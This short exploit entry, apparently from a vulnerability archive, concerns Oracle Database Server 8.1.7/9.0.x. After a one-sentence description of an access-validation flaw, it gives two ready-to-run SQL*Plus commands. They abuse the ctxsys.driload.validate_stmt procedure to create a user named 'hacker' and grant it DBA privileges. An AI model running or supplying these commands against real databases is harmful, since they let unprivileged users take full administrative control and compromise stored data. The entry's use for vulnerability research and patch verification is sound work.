Oracle Database Server 8.1.7/9.0.x - ctxsys.driload Access Validation
source: https://www.securityfocus.com/bid/11099/info
Oracle Database Server is prone to an access validation vulnerability that may permit unprivileged users to execute commands as the DBA. This could compromise the database.
SQL> exec ctxsys.driload.validate_stmt
('create user hacker identified by hacker');
SQL> exec ctxsys.driload.validate_stmt('grant dba, connect to hacker');